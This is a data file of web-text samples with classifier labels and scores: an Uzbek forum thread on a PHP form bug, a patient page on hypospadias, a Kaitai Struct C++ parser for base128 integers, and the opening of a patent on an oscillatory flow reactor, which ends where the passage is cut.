content
string
pred_label
string
pred_score
float64
Assalomu alaykum, yordam.uz saytimizga xush kelibsiz. Bu saytda o`zingizni qiziqtirgan savollarga javob olishingiz va o`z sohangiz bo`yicha savollarga javob berishingiz mumkin. Bizning Oilamizga a'zo bo`lganingiz uchun chuqur Minnatdorchilik bildiramiz !!! Php kod tushinmovchilik, o`zgaruvchilar berilmagan deb chiqyapti +2 ovoz 111 marta ko‘rilgan so‘radi 31 iyul, 17 Nodirbek (68 bal) tahrirlandi 31 iyul, 17 Saidolim Php kod tushinmovchilik $error_kimga $error_kimdan $error_email variablelarini berilmagan deb chiqyapti <?php session_start(); if(isset($_POST["ok"])) { $kimdan = htmlspecialchars($_POST["ism"]); $kimga = htmlspecialchars($_POST["kimga"]); $email = htmlspecialchars($_POST["email"]); $xat = htmlspecialchars($_POST["xat"]); $_SESSION["kimdan"] = $kimdan; $_SESSION["kimga"] = $kimga; $_SESSION["email"] = $email; $_SESSION["xat"] = $xat; $error_email = ""; $error_kimdan = ""; $error_kimga = ""; $error_xat = ""; $error = false; if(empty($kimdan) or preg_match("/@/", $kimdan)){ $error_kimdan = "Ismni to'g'ri kiriting!"; $error = true; } if(empty($kimga) or preg_match("/@/", $kimga)){ $error_kimga = "Ismini to'g'ri kiriting!"; $error = true; } if(empty($email) or !preg_match("/@/", $email)){ $error_email = "E-pochta manzilini to'g'ri kiriting!"; $error = true; } if(empty($xat) or strlen($xat) == 0){ $error_xat = "Xatni kirit so`tak"; $error = true; } } ?> <!DOCTYPE html> <html> <head> <title>Yakunlovchi dars</title> </head> <body> <h3>Biz bilan aloqa</h3> <form action="" name="aloqa" method="post"> <label>Kimdan:</label><br> <input type="text" name="ism" value="<?=$_SESSION["kimdan"]?>"><br> <span style="color:red"><?php echo $error_kimdan; ?></span><br> <label>Kimga:</label><br> <input type="text" name="kimga" value="<?=$_SESSION["kimga"]?>"><br> <span style="color:red"><?php echo $error_kimga; ?></span><br> <label>Email:</label><br> <input type="email" name="email" value="<?=$_SESSION["email"]?>"><br> <span style="color:red"><?php echo $error_email; ?></span><br> <label>Xat:</label><br> <textarea name="xat" cols="20" rows="10"><?=$_SESSION["xat"]?></textarea> <span style="color:red"><?=$error_xat?></span><br> <br> <input type="submit" name="ok" value="OK"><br> </form> </body> </html> izoh qoldirdi 31 iyul, 17 Nodirbek (68 bal) okni bossam keyin yo'q bop ketyapti 3 Javoblar +3 ovoz javob berdi 31 iyul, 17 Kenjebaev (1,092 bal) $error_email = ""; $error_kimdan = ""; $error_kimga = ""; $error_xat = ""; session_start(); dan keyin qo'ying +1 ovoz javob berdi 31 iyul, 17 Saidolim (3,566 bal) savolning aniq nima xato berganini tushunmadim, lekin  $kimdan = htmlspecialchars($_POST["ism"]); <input type="text" name="ism" value="<?=$_SESSION["kimdan"]?>"> shu 2 ta qatorni to`g`rilash kerak. 2 xil nom turibdi. +1 ovoz javob berdi 10 avgust, 17 Anvar Ulugov (39 bal) Siz o'sha o'zgaruvchilarni if(isset($_POST["ok"])) { shartining ichida e'lon qilyapsiz. Ushbu shart qondirilmagan holatda bu o'zgaruvchilar e'lon qilinmasdan qolyapti. Bu o'zgaruvchilarni if shartingizdan yuqorida, ya'ni tashqarida e'lon qilib, if shartini ichida unga qiymat bering. Assalomu alaykum, yordam.uz saytimizga xush kelibsiz. Bu saytda o`zingizni qiziqtirgan savollarga javob olishingiz va o`z sohangiz bo`yicha savollarga javob berishingiz mumkin. Bizning Oilamizga a'zo bo`lganingiz uchun chuqur Minnatdorchilik bildiramiz !!! Telegram kanal YordamUzRss ...
__label__pos
0.563077
• 530.541.3420 | 2170 South Avenue, S. Lake Tahoe, CA Health Back Hypospadias What is hypospadias? Hypospadias is a malformation that affects the urethral tube and the foreskin on a male's penis. The urethra is the tube that carries urine from the bladder to the outside of the body. Hypospadias is a disorder in which the male urethral opening is not located at the tip of the penis. The urethral opening can be located anywhere along the urethra. Most commonly with hypospadias, the opening is located along the underside of the penis, near the tip. What causes hypospadias? Hypospadias is a congenital (present at birth) anomaly (abnormality), which means that the malformation occurs during fetal development. As the fetus develops, the urethra does not grow to its complete length. Also during fetal development, the foreskin does not develop completely, which typically leaves extra foreskin on the top side of the penis and no foreskin on the underside of the penis. Who is affected by hypospadias? According to pediatric neurologists: • Hypospadias is a disorder that primarily affects male newborns. • Hypospadias also has a genetic component. Some fathers of males with hypospadias also have the condition.  • Prematurity and low birth weight are also considered risk factors for hypospadias. What are the symptoms of hypospadias? The following are the most common symptoms of hypospadias. However, each baby may experience symptoms differently. Symptoms may include: • Abnormal appearance of foreskin and penis on exam • Abnormal direction of urine stream • The end of the penis may be curved downward The symptoms of a hypospadias may resemble other conditions or medical problems. Always consult your baby's physician for a diagnosis. How is hypospadias diagnosed? A physician or health care professional usually diagnoses hypospadias at birth. The malformation can be detected by physical examination. What is the treatment for hypospadias? Specific treatment for hypospadias will be determined by your baby's physician based on: • Your baby's gestational age, overall health, and medical history • The extent of the condition • Your baby's tolerance for specific medications, procedures, or therapies • Expectations for the course of the condition • Your opinion or preference Hypospadias can be repaired with surgery. Usually, the surgical repair is done when your baby is between 6 and 24 months, when penile growth is minimal. At birth, your male child will not be able to undergo circumcision, as the extra foreskin may be needed for the surgical repair. The surgical repair can usually be done on an outpatient basis (and may require multiple surgeries depending on the severity). If a hypospadias deformity is not repaired, the following complications may occur as your child grows and matures: • The urine stream may be abnormal. The stream may point in the direction of the opening, or it may spread out and spray in multiple directions. • The penis may curve as your baby grows causing sexual dysfunction later in life. • If the urethral opening is closer to the scrotum or perineum, your baby may have problems with fertility later in life. Please consult your physician with any questions or concerns you may have regarding this condition.
__label__pos
0.948685
Variable length quantity, unsigned integer, base128, big-endian: C++/STL parsing library A variable-length unsigned integer using base128 encoding. 1-byte groups consist of 1-bit flag of continuation and 7-bit value chunk, and are ordered "most significant group first", i.e. in "big-endian" manner. This particular encoding is specified and used in: • Standard MIDI file format • ASN.1 BER encoding More information on this encoding is available at https://en.wikipedia.org/wiki/Variable-length_quantity This particular implementation supports serialized values to up 8 bytes long. KS implementation details License: CC0-1.0 Minimal Kaitai Struct required: 0.7 This page hosts a formal specification of Variable length quantity, unsigned integer, base128, big-endian using Kaitai Struct. This specification can be automatically translated into a variety of programming languages to get a parsing library. Usage Using Kaitai Struct in C++/STL usually consists of 3 steps. 1. We need to create an STL input stream (std::istream). • One can open a stream for reading from a local file: #include <fstream> std::ifstream is("path/to/local/file.vlq_base128_be", std::ifstream::binary); • Or one can prepare a stream for reading from existing std::string str: #include <sstream> std::istringstream is(str); • Or one can parse arbitrary char* buffer in memory, given that we know its size: #include <sstream> const char buf[] = { ... }; std::string str(buf, sizeof buf); std::istringstream is(str); 2. We need to wrap our input stream into Kaitai stream: #include <kaitai/kaitaistream.h> kaitai::kstream ks(&is); 3. And finally, we can invoke the parsing: vlq_base128_be_t data(&ks); After that, one can get various attributes from the structure by invoking getter methods like: data.value() // => Resulting value as normal integer C++/STL source code to parse Variable length quantity, unsigned integer, base128, big-endian vlq_base128_be.h #ifndef VLQ_BASE128_BE_H_ #define VLQ_BASE128_BE_H_ // This is a generated file! Please edit source .ksy file and use kaitai-struct-compiler to rebuild #include "kaitai/kaitaistruct.h" #include <stdint.h> #include <vector> #if KAITAI_STRUCT_VERSION < 7000L #error "Incompatible Kaitai Struct C++/STL API: version 0.7 or later is required" #endif /** * A variable-length unsigned integer using base128 encoding. 1-byte groups * consist of 1-bit flag of continuation and 7-bit value chunk, and are ordered * "most significant group first", i.e. in "big-endian" manner. * * This particular encoding is specified and used in: * * * Standard MIDI file format * * ASN.1 BER encoding * * More information on this encoding is available at * https://en.wikipedia.org/wiki/Variable-length_quantity * * This particular implementation supports serialized values to up 8 bytes long. */ class vlq_base128_be_t : public kaitai::kstruct { public: class group_t; vlq_base128_be_t(kaitai::kstream* p__io, kaitai::kstruct* p__parent = 0, vlq_base128_be_t* p__root = 0); private: void _read(); public: ~vlq_base128_be_t(); /** * One byte group, clearly divided into 7-bit "value" chunk and 1-bit "continuation" flag. */ class group_t : public kaitai::kstruct { public: group_t(kaitai::kstream* p__io, vlq_base128_be_t* p__parent = 0, vlq_base128_be_t* p__root = 0); private: void _read(); public: ~group_t(); private: bool f_has_next; bool m_has_next; public: /** * If true, then we have more bytes to read */ bool has_next(); private: bool f_value; int32_t m_value; public: /** * The 7-bit (base128) numeric value chunk of this group */ int32_t value(); private: uint8_t m_b; vlq_base128_be_t* m__root; vlq_base128_be_t* m__parent; public: uint8_t b() const { return m_b; } vlq_base128_be_t* _root() const { return m__root; } vlq_base128_be_t* _parent() const { return m__parent; } }; private: bool f_last; int32_t m_last; public: int32_t last(); private: bool f_value; int32_t m_value; public: /** * Resulting value as normal integer */ int32_t value(); private: std::vector<group_t*>* m_groups; vlq_base128_be_t* m__root; kaitai::kstruct* m__parent; public: std::vector<group_t*>* groups() const { return m_groups; } vlq_base128_be_t* _root() const { return m__root; } kaitai::kstruct* _parent() const { return m__parent; } }; #endif // VLQ_BASE128_BE_H_ vlq_base128_be.cpp // This is a generated file! Please edit source .ksy file and use kaitai-struct-compiler to rebuild #include "vlq_base128_be.h" vlq_base128_be_t::vlq_base128_be_t(kaitai::kstream* p__io, kaitai::kstruct* p__parent, vlq_base128_be_t* p__root) : kaitai::kstruct(p__io) { m__parent = p__parent; m__root = this; f_last = false; f_value = false; _read(); } void vlq_base128_be_t::_read() { m_groups = new std::vector<group_t*>(); { int i = 0; group_t* _; do { _ = new group_t(m__io, this, m__root); m_groups->push_back(_); i++; } while (!(!(_->has_next()))); } } vlq_base128_be_t::~vlq_base128_be_t() { for (std::vector<group_t*>::iterator it = m_groups->begin(); it != m_groups->end(); ++it) { delete *it; } delete m_groups; } vlq_base128_be_t::group_t::group_t(kaitai::kstream* p__io, vlq_base128_be_t* p__parent, vlq_base128_be_t* p__root) : kaitai::kstruct(p__io) { m__parent = p__parent; m__root = p__root; f_has_next = false; f_value = false; _read(); } void vlq_base128_be_t::group_t::_read() { m_b = m__io->read_u1(); } vlq_base128_be_t::group_t::~group_t() { } bool vlq_base128_be_t::group_t::has_next() { if (f_has_next) return m_has_next; m_has_next = (b() & 128) != 0; f_has_next = true; return m_has_next; } int32_t vlq_base128_be_t::group_t::value() { if (f_value) return m_value; m_value = (b() & 127); f_value = true; return m_value; } int32_t vlq_base128_be_t::last() { if (f_last) return m_last; m_last = (groups()->size() - 1); f_last = true; return m_last; } int32_t vlq_base128_be_t::value() { if (f_value) return m_value; m_value = (((((((groups()->at(last())->value() + ((last() >= 1) ? ((groups()->at((last() - 1))->value() << 7)) : (0))) + ((last() >= 2) ? ((groups()->at((last() - 2))->value() << 14)) : (0))) + ((last() >= 3) ? ((groups()->at((last() - 3))->value() << 21)) : (0))) + ((last() >= 4) ? ((groups()->at((last() - 4))->value() << 28)) : (0))) + ((last() >= 5) ? ((groups()->at((last() - 5))->value() << 35)) : (0))) + ((last() >= 6) ? ((groups()->at((last() - 6))->value() << 42)) : (0))) + ((last() >= 7) ? ((groups()->at((last() - 7))->value() << 49)) : (0))); f_value = true; return m_value; }
__label__pos
0.959474
Title: MULTI-PHASE OSCILLATORY FLOW REACTOR Kind Code: A1 Abstract: According to some aspects, described herein is an automated droplet-based reactor that utilizes oscillatory motion of a droplet in a tubular reactor under inert atmosphere. In some cases, such a reactor may address current shortcomings of continuous multi-phase flow platforms. Inventors: Abolhasani, Milad (Raleigh, NC, US) Coley, Connor Wilson (Cincinnati, OH, US) Jensen, Klavs F. (Lexington, MA, US) Application Number: 15/235730 Publication Date: 02/16/2017 Filing Date: 08/12/2016 Assignee: Massachusetts Institute of Technology (Cambridge, MA, US) Primary Class: International Classes: B01J19/00; G01V8/20 View Patent Images: Related US Applications: 20030026732Continuous processing automated workstationFebruary, 2003Gordon et al. 20090311131STERILIZING METHOD AND STERILIZING APPARATUS FOR RETORTED PRODUCTSDecember, 2009Tago et al. 20010044152Dual beam, pulse propagation analyzer, medical profiler interferometerNovember, 2001Burnett 20030091487Continuous flow heating systemMay, 2003Fagrell 20040211172Muffler and catalytic converter devicesOctober, 2004Wang et al. 20080299670COMBUSTION TUBE AND METHOD FOR COMBUSTING A SAMPLE FOR COMBUSTION ANALYSISDecember, 2008Smeets et al. 20100055023MANUFACTURING CARBON NANOTUBE PAPERMarch, 2010Kim et al. 20030099582Element with dosimeter and identification meansMay, 2003Steklenski et al. 20090321319Multi-Staged Hydroprocessing Process And SystemDecember, 2009Kokayeff et al. 20060000709Methods for modulation of flow in a flow pathwayJanuary, 2006Bohm et al. 20040115092Caffeine detectorJune, 2004Starr Primary Examiner: SEIFU, LESSANEWORK T Attorney, Agent or Firm: WOLF GREENFIELD & SACKS, P.C. (BOSTON, MA, US) Claims: What is claimed is: 1. An oscillatory flow reactor comprising: a sample port; a carrier phase port; and a tubing having a centerline running through a lumen of the tubing from a first end of the tubing to a second end of the tubing, the tubing being curved such that an imaginary straight line intersects with the centerline at least twice such that at least two portions of the tubing are aligned and observable with a single optical port. 2. The oscillatory flow reactor of claim 1, wherein the imaginary straight line is substantially perpendicular to the centerline of the tubing. 3. (canceled) 4. The oscillatory flow reactor of claim 1, further comprising: a pressure source; and one or more sensors aligned with the imaginary straight line which provide sample location feedback to the pressure source to control oscillatory motion of a sample based at least in part on sample location. 5. The oscillatory flow reactor of claim 4, wherein the one or more sensors comprise one or more photodetectors. 6. (canceled) 7. The oscillatory flow reactor of claim 5, further comprising a light source corresponding to each of the one or more photodetectors. 8. The oscillatory flow reactor of claim 1, further comprising: a heater adapted to heat contents in the tubing; and a housing supporting the tubing and the heater. 9. The oscillatory flow reactor of claim 1, wherein the tubing is horseshoe-shaped. 10. The oscillatory flow reactor of claim 1, wherein the tubing is U-shaped. 11. (canceled) 12. The oscillatory flow reactor of claim 1, wherein the tubing has an inner surface comprising a fluoropolymer. 13. The oscillatory flow reactor of claim 12, wherein the fluoropolymer comprises at least one of FEP, PTFE or PFA. 14. The oscillatory flow reactor of claim 4, wherein the one or more sensors comprises a first sensor positioned at one portion of the tubing and a second sensor positioned at another portion of the tubing, and the length along the tubing from the first sensor to the second sensor is greater than 1 cm and the distance from the first sensor to the second sensor is less than the length along the tubing from the first sensor to the second sensor. 15. (canceled) 16. A method of using an oscillatory flow reactor comprising: injecting an aqueous droplet into a tubing, the tubing comprising a fluoropolymer; injecting an organic substance droplet into the tubing; producing oscillatory flow of the aqueous droplet and the organic substance droplet through application of alternating pressure to the tubing, such that the aqueous droplet moves through organic substance droplet with each oscillation. 17. The method of claim 16, wherein the oscillatory flow reactor further comprises: a sample port; a carrier phase port; a tubing; a pressure source; and one or more sensors which provide sample location feedback to the pressure source to control oscillatory motion of a sample based at least in part on sample location. 18. The method of claim 16, wherein the fluoropolymer comprises at least one of FEP, PTFE or PFA. 19. An oscillatory flow reactor comprising: a tubing having an inner surface comprising a fluoropolymer, such that an aqueous droplet moves through an organic substance droplet in the tubing during application of alternating pressure to the tubing; a housing supporting the tubing; a carrier phase port in fluid communication with the tubing; and a sample port in fluid communication with the tubing. 20. The oscillatory flow reactor of claim 19, further comprising: a pressure source; and one or more sensors which provide sample location feedback to the pressure source to control oscillatory motion of a sample based at least in part on sample location. 21. 21-23. (canceled) 24. The oscillatory flow reactor of claim 19, wherein the tubing has a curved shape such that at least two portions of the tubing are aligned and observable with a single optical port. 25. 25-27. (canceled) 28. The oscillatory flow reactor of claim 20, wherein the one or more sensors comprises a first sensor positioned at one portion of the tubing and a second sensor positioned at another portion of the tubing, and the length along the tubing from the first sensor to the second sensor is greater than 1 cm. 29. 29-31. (canceled) 32. The oscillatory flow reactor of claim 19, wherein the fluoropolymer comprises at least one of FEP, PTFE or PFA. 33. The oscillatory flow reactor of claim 32, wherein the fluoropolymer comprises FEP. 34. 34-42. (canceled) Description: RELATED APPLICATIONS This Application claims priority under 35 U.S.C. §119(e) to U.S. Provisional Application Ser. No. 62/205,088, entitled “MULTI-PHASE OSCILLATORY FLOW REACTOR” filed on Aug. 14, 2015, which is herein incorporated by reference in its entirety. FEDERALLY SPONSORED RESEARCH This invention was made with government support under ECCS1449291 awarded by the NSF. The government has certain rights in the invention. FIELD Embodiments of the present invention generally relate to an oscillatory flow reactor and methods of using such a reactor. BACKGROUND Various multi-phase small scale strategies have been developed as an alternative to batch scale screening approaches due to their enhanced mass and heat transfer characteristics, safety and controllability, and efficiency in reagent usage. SUMMARY According to one aspect, an oscillatory flow reactor includes a sample port, a carrier phase port, and a tubing having a centerline running through a lumen of the tubing from a first end of the tubing to a second end of the tubing. The tubing is curved such that an imaginary straight line intersects with the centerline at least twice such that at least two portions of the tubing are aligned and observable with a single optical port. According to another aspect, a method of using an oscillatory flow reactor includes injecting an aqueous droplet into a tubing. The tubing has an inner surface comprising a fluoropolymer. The method also includes injecting an organic substance droplet into the tubing, and producing oscillatory flow of the aqueous droplet and the organic substance droplet through application of alternating pressure to the tubing such that the aqueous droplet moves through organic substance droplet with each oscillation. According to yet another aspect, an oscillatory flow reactor includes a tubing having an inner surface comprising a fluoropolymer, such that an aqueous droplet moves through an organic substance droplet in the tubing during application of alternating pressure to the tubing. The oscillatory flow reactor also includes a housing supporting the tubing, a carrier phase port in fluid communication with the tubing, and a sample port in fluid communication with the tubing. According to yet another aspect, a multiplexed oscillatory flow reactor arrangement includes a first reactor having a first tubing, a second reactor having a second tubing, and a pressure source. The arrangement also includes a first flow controller that opens and closes fluid communication between the pressure source and the first reactor and a second flow controller that opens and closes fluid communication between the pressure source and the first reactor. The arrangement also includes a multi-way selector valve adapted to guide a first droplet to the first reactor and a second droplet to the second reactor. The arrangement also includes one or more sensors which provide sample location feedback to the pressure source to control oscillatory motion of a sample based at least in part on sample location. Other advantages and novel features of the present invention will become apparent from the following detailed description of various non-limiting embodiments of the invention when considered in conjunction with the accompanying figures. In cases where the present specification and a document incorporated by reference include conflicting and/or inconsistent disclosure, the present specification shall control. If two or more documents incorporated by reference include conflicting and/or inconsistent disclosure with respect to each other, then the document having the later effective date shall control. BRIEF DESCRIPTION OF DRAWINGS Non-limiting embodiments that incorporate one or more aspects of the invention will be described by way of example with reference to the accompanying figures, which are schematic and are not necessarily intended to be drawn to scale. In the figures, each identical or nearly identical component illustrated is typically represented by a single numeral. For purposes of clarity, not every component is labeled in every figure, nor is every component of each embodiment of the invention shown where illustration is not necessary to allow those of ordinary skill in the art to understand the invention. In the figures: FIG. 1A is a perspective view of one embodiment of an oscillatory flow reactor having linear tubing; FIG. 1B is a top view of the reactor shown in FIG. 1A; FIG. 2A is a schematic of one embodiment of an oscillatory flow reactor having curved tubing; FIG. 2B is a perspective view of an oscillatory flow reactor having curved tubing; FIG. 3 is a perspective view of one arrangement of an oscillatory flow reactor used for growth and characterization of semiconductor nanocrystals; FIG. 4 depicts time-series of bright-field images of one complete oscillation cycle of a droplet within the reactor of FIG. 3; FIG. 5 depicts a graph of measured voltages of the two photodetectors placed on the left (L) and right (R) sides of the housing at times (I) and (II) highlighted in FIG. 4; FIG. 6A depicts a schematic of a ligand exchange process for solar cell applications; FIG. 6B depicts a schematic of a batch scale ligand exchange process involving two immiscible fluids; FIG. 6C depicts phase separation of the two immiscible fluids at each oscillation cycle in an oscillatory flow reactor; FIG. 7 depicts an automated oscillatory multiphase flow reactor arrangement for in-situ studies of quantum dot ligand exchange processes; FIG. 8 depicts illustrations of different steps associated with injection of the organic phase containing QDs into the other immiscible fluid and the subsequent oscillatory motion of the bi-phasic slug within a reactor; FIG. 9 depicts a schematic of one arrangement of an oscillatory flow reactor used for in-situ measurement of partition coefficient; FIG. 10 depicts an illustration of different steps associated with injection of the organic phase into the aqueous phase and the subsequent oscillatory motion of the bi-phasic slug within the reactor; FIG. 11 is a bright-field snapshot time-series of the oscillatory motion of a bi-phasic slug along the reactor tubing; FIG. 12 depicts a schematic of one arrangement of an oscillatory flow reactor used for in-flow studies of visible-light photoredox catalysis; FIG. 13 depicts a closer view of the horseshoe-shaped oscillatory flow reactor; FIG. 14 summarizes some advantages/capabilities of the reactor arrangement of FIG. 12; FIG. 15 depicts an exploded view of the reactor integrated with a high power LED and a peltier cooler; FIG. 16A summarizes the effect of catalyst loading and time on the photoredox catalysis; FIG. 16B summarizes the effect of solvent selection and time on the photoredox catalysis; FIG. 16C summarizes the effect of photon flux on the photoredox catalysis; FIG. 17A depicts a perspective view of a multiplexed reactor arrangement; FIG. 17B depicts a detailed view of the multiplexed reactor arrangement shown in FIG. 17A; FIG. 18 depicts a support used in the multiplexed reactor arrangement shown in FIG. 17A; and FIG. 19 depicts a schematic detailing the components of one embodiment of a multiplexed arrangement. DETAILED DESCRIPTION Aspects of the invention are not limited in application to the details of construction and the arrangement of components set forth in the following description or illustrated in the drawings. Also, the phraseology and terminology used herein is for the purpose of description and should not be regarded as limiting. The inventors have recognized several shortcomings associated with conventional continuous multi-phase flow small scale microreactor arrangements. Due to the constant length of the continuous multi-phase flow microreactor, the intrinsic dependence of the degree of mixing on residence times associated with continuous microscale platforms makes it challenging to reproduce the same mixing characteristics for different synthesis times. In addition, the use of a liquid as the immiscible carrier phase results in droplet-to-droplet communication through the lubrication films surrounding the dispersed phase, thereby altering the accuracy of the reagent concentrations in each droplet. These shortcomings of continuous multi-phase flow approaches have limited the utilization of flow chemistry platforms for studies of physical/chemical processes having processing times exceeding 10 minutes. Moreover, the in-flow addition of reagents into flowing droplets for multi-step chemical reactions has proved to be challenging due to the feedback effect of the in-line injections on the downstream flowrates. The challenges associated with in-line synchronization of the reagent injection into flowing droplets have limited the addressable parameter space of multi-step chemical reactions. The inventors have recognized the need for a general flow-based technology which addresses the current challenges and shortcomings of continuous droplet flow techniques to achieve further progress in at least the pharmaceutical, materials and energy sectors. According to some aspects, an automated droplet-based reactor utilizes oscillatory motion of a droplet in a tubular reactor under inert (e.g., argon) or reactive (e.g., oxygen) atmosphere to address current shortcomings of continuous multi-phase flow platforms. In some cases, the inventors have recognized that such an arrangement may provide or permit one or more beneficial characteristics, such as: • 1. The use of integrated optical probes within the inlet and outlet of the oscillatory flow reactor enables robust, reproducible and fully automated motion of the droplet within the reactor without over/under shooting. • 2. The oscillatory motion of the droplet removes the residence time limitation associated with continuous multi-phase flow platforms, without restricting the linear flow rate. • 3. The oscillatory flow reactor enables in-situ single-point spectral characterization of the solute concentration within the droplet (microreaction vessel) at the process temperature, without the need for setup manipulation. • 4. Separation of the mixing and residence times in the oscillatory flow reactor enables operation of distinct multi-step chemical processes with different characteristic time-scales within the same reactor. • 5. The oscillatory flow reactor includes a housing that holds a removable tubing that can be removed and replaced with a tubing of a different material to enable material selection that is suitable for the desired application (e.g., having suitable surface properties). • 6. Pressurization of void space external to the capillary enables elimination of the pressure differential inside and outside of the capillary to reduce gas permeation across capillary walls. Overview According to one aspect, the oscillatory flow reactor includes tubing having a defined first end and a second end, such that the tubing does not form a continuous closed circuit. In such an arrangement, a sample moves back and forth in the tubing alternating toward each end instead of continuously moving along one direction. In some embodiments, this oscillatory motion of the sample inside the tubing may be controlled by one or more pressure sources that are in fluid communication with the tubing. One or more flow controllers may open and close fluid communication between the tubing and the one or more pressure sources. The reactor may have one or more sensors providing sample location feedback to the pressure source(s) to control the motion of the sample based at least in part on sample location. For example, a sensor may detect that the sample is approaching one end of the tubing, and may send a signal to a pressure source to input pressure into that end of the tubing, causing the sample to move back toward the other opposing end of the tubing. The sensor may be a photodetector, a flow meter or any other suitable sensor. In some embodiments, where the sensor is a photodetector, each photodetector is paired with a corresponding light source. The tubing may be positioned between the light source and the photodetector. Examples of light sources include LEDs, optical fibers, lasers, ultraviolet-visible lamps (e.g., deuterium, tungsten halogen), incandescent bulbs, or any other suitable light source. The pressure source may be a pump such as a syringe pump, a suction pump, a vacuum pump, or any other suitable pressure source. Each of these aforementioned components of the reactor may be supported by the housing. The tubing may be connected to various components depending on the particular application of the reactor. For example, the tubing may connect to a source providing an inert atmosphere (e.g., argon). Other examples of components that may connect to the tubing include: a reagent/sample source, a selector valve, a high performance liquid chromatography (HPLC) or liquid chromatography-mass spectrometry (LC-MS) unit, one or more valves, or any other suitable component depending on the desired application. According to one aspect, the material of the tubing may be important for facilitating measurement and/or testing. In some cases, the inner material of the tubing may create a difference between the surface energies of two liquid substances being moved through the tubing in order to enable measurement and/or testing. For example, the inner surface of the tubing may be made from a material that creates a difference between the surface energies of an aqueous phase and an organic phase that enables time-resolved in-situ spectral characterization of the organic substance within each phase without additional phase separation. As will be discussed in an example, taking advantage of the difference between the surface energies of aqueous and organic solvents on the inner surface of the tubing, a fully automated small-scale strategy may be used based on gas-driven oscillatory motion of a bi-phasic slug for high-throughput in-situ measurement and screening of partition coefficients of organic substances between aqueous and organic phases. In some embodiments, for example, the tubing may be made from fluoropolymers, including amorphous fluoropolymers, such as, PTFE (polytetrafluoroethylene), FEP (fluorinated ethylene propylene), PFA (perfluoroalkoxy polymer resin), any TEFLON polymer, glass, fused silica, or other suitable material. In some embodiments, the inner surface of the tubing is made of any one of these materials or any other suitable material. In some embodiments, the tubing is transparent or translucent. In some embodiments, the tubing is flexible, and has favorable wetting properties (i.e., hydrophobic). In one embodiment, an oscillatory flow reactor comprises a tubing having an inner surface comprising a fluoropolymer, such that an aqueous droplet moves through an organic substance droplet in the tubing during application of alternating pressure to the tubing, a housing supporting the tubing, a carrier phase port in fluid communication with the tubing and a sample port in fluid communication with the tubing. The tubing may be transparent or translucent. The tubing may be flexible, and have favorable wetting properties (i.e., hydrophobic). In some embodiments, the housing may hold one or more heaters and/or coolers that adjust the temperature of the substance(s) flowing through the tubing to a desired temperature depending on the particular application of the reactor. The housing may also support or otherwise connect with other components, including measurement instruments such as, but not limited to, a thermocouple or other temperature measurement instrument. In some embodiments, the housing may include an inlet for receiving a gas such as nitrogen. According to one aspect, the length of the tubing may be chosen to allow a droplet to reach a constant velocity. In some embodiments, the reactor arrangement includes a first sensor positioned at one portion of the tubing and a second sensor positioned at another portion of the tubing. For example, in one embodiment, a light source and photodetector are positioned at the first portion of the tubing and a second light source and photodetector are located at the second portion of the tubing. In some embodiments, the length along the tubing from the first sensor to the second sensor (as opposed to the distance between the first and second sensors) is 12 cm. For example, if the tubing is curved, the length along the tubing from the first sensor to the second sensor is the length defined by measuring from the first sensor to the second sensor, following along the tubing. As such, if the tubing is curved, the actual distance from the first sensor to the second sensor will be shorter than the length along the tubing from the first sensor to the second sensor. If the tubing is straight, the actual distance from the first sensor to the second sensor will be the same as the length along the tubing from the first sensor to the second sensor. The length along the tubing from the first sensor to the second sensor may be any other suitable length depending on the desired application and volume, e.g., 10-12 cm, 10-15 cm, 10-20 cm, etc. One embodiment of an automated oscillatory flow reactor, shown in FIG. 3, consists of a 12 cm long tubular reactor (e.g., 0.0625 inch inner diameter made of, e.g., FEP, PTFE or PFA) embedded within a custom-machined aluminum chuck housing, two fiber-coupled LEDs and photodetectors, as well as a fiber-coupled UV-Vis light source and a miniature spectrometer. Four cartridge heaters, which may be embedded within the aluminum chuck housing (two on each side) in combination with a thermocouple embedded in the aluminum chuck, are used for heating the reactor. Three computer-controlled syringe pumps may be used to prepare the droplet with the desired composition under inert atmosphere (e.g., argon) and to control its oscillation within the heated zone of the reactor. Linear Tubing A first illustrative embodiment of an oscillatory flow reactor is shown in FIGS. 1A-1B. The reactor includes tubing 20 that runs through a housing 10. The reactor also has a first light source 41 paired with a corresponding first photodetector 31 and a second light source 43 paired with a corresponding second photo detector 33. The first light source and photodetector pair 31, 41 may be positioned near a first end of the tubing 20, and the second light source and photodetector pair 33, 43 may be positioned near a second end of the tubing. As discussed above, the first and second pairs of light sources and photodetectors may serve as triggers for switching the flow direction in the tubing. A third light source 45 and corresponding photodetector 35 may be positioned between these two pairs of photodetectors and light sources. The third light source and photodetector pair may serve as a spectral characterization point. In some embodiments, the third photodetector 35 is positioned at the midpoint between the two light source and photodetector pairs, and may be, in some cases, at the centerpoint along the length of the reactor. In some embodiments, the light sources 41 and 43 are LEDs, and may be, in some cases, blue LEDs having a wavelength of 405 nm. The third light source 45 may be a fiber coupled light source. In some embodiments, the third photodetector 35 is a spectrometer, and may be fiber coupled. In some embodiments, the housing supports or otherwise connects with a thermocouple 48. The housing also includes an inlet for receiving a gas 47 such as nitrogen. The ends of tubing 20 may be connected to other components 61, 63, depending on the desired application. In some embodiments, fittings 21, 23 are attached to the ends of the tubing to connect the tubing to other components. In some embodiments, the fittings are T-junctions or otherwise have a plurality of pathways to permit the attachment of multiple components to the tubing ends. Curved Tubing According to one aspect, in some embodiments of the oscillatory flow reactor, the arrangement uses only one optical port which serves both as the trigger for switching the flow direction and as the spectral characterization point. This arrangement may be accomplished by having tubing that is curved such that at least two portions of the tubing are aligned and observable with a single optical port. A photodetector that is also aligned with the two aligned portions of the tubing is able to detect activity occurring in both portions of the tubing. Said another way, the tubing has a centerline 29 that runs through the lumen of the tubing from one end of the tubing to the other end. The tubing is curved in such a way that an imaginary straight line 39 will intersect with the tubing centerline at least twice. A detector having an optical path directed along that imaginary straight line is able to detect activity occurring at each intersection point. In some embodiments, the imaginary straight line intersecting with the tubing centerline at least twice is substantially perpendicular to the tubing centerline (e.g., plus or minus about 5, 6, 7, 8, 9 or 10 degrees). As illustrative examples, the tubing may be curved in a horseshoe shape, U-shape, elongated U-shape, or any other suitable curved shape. An illustrative embodiment of an oscillatory flow reactor is shown in FIGS. 2A-2B. The reactor has a curved tubing 20. First and second portions 25, 26 of the tubing are aligned with one another and are also aligned with a light source 41 and photo detector 31. The light source and photodetector combine to form an optical port that serves as both the trigger for switching the flow direction and as the spectral characterization point. As seen in FIG. 2B, in some embodiments, the housing 10 that holds the tubing 20 may include heaters 70. Applications In some cases, the small reagent volume (e.g., 5-20 μL) required for each reaction condition in the oscillatory flow reactor and the ability to provide similar mixing behavior to a batch system make the 